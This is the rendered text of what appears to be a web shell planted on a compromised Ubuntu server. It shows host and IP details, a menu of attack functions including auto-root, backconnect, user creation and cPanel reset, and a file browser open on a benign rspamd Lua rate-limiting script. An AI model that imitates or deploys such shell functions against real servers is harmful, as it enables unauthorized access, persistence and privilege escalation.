Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.135.201.190
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
rspamd /
lualib /
redis_scripts /
[ HOME SHELL ]
Name
Size
Permission
Action
bayes_cache_check.lua
542
B
-rw-r--r--
bayes_cache_learn.lua
1.74
KB
-rw-r--r--
bayes_classify.lua
1.21
KB
-rw-r--r--
bayes_learn.lua
1.46
KB
-rw-r--r--
bayes_stat.lua
554
B
-rw-r--r--
neural_maybe_invalidate.lua
754
B
-rw-r--r--
neural_maybe_lock.lua
567
B
-rw-r--r--
neural_save_unlock.lua
744
B
-rw-r--r--
neural_train_size.lua
594
B
-rw-r--r--
ratelimit_check.lua
3.26
KB
-rw-r--r--
ratelimit_cleanup_pending.lua
1.09
KB
-rw-r--r--
ratelimit_update.lua
3.54
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ratelimit_cleanup_pending.lua
-- This script cleans up the pending requests in Redis. -- KEYS: Input parameters -- KEYS[1] - prefix: The Redis key prefix used to store the bucket information. -- KEYS[2] - now: The current time in milliseconds. -- KEYS[3] - expire: The expiration time for the Redis key storing the bucket information, in seconds. -- KEYS[4] - number_of_recipients: The number of requests to be allowed (or the increase rate). -- 1. Retrieve the last hit time and initialize variables local prefix = KEYS[1] local last = redis.call('HGET', prefix, 'l') local nrcpt = tonumber(KEYS[4]) if not last then -- No bucket, no cleanup return 0 end -- 2. Update the pending values based on the number of recipients (requests) local pending = redis.call('HGET', prefix, 'p') pending = tonumber(pending or '0') if pending < nrcpt then pending = 0 else pending = pending - nrcpt end -- 3. Set the updated values back to Redis and update the expiration time for the bucket redis.call('HMSET', prefix, 'p', tostring(pending), 'l', KEYS[2]) redis.call('EXPIRE', prefix, KEYS[3]) -- 4. Return the updated pending value return pending
Close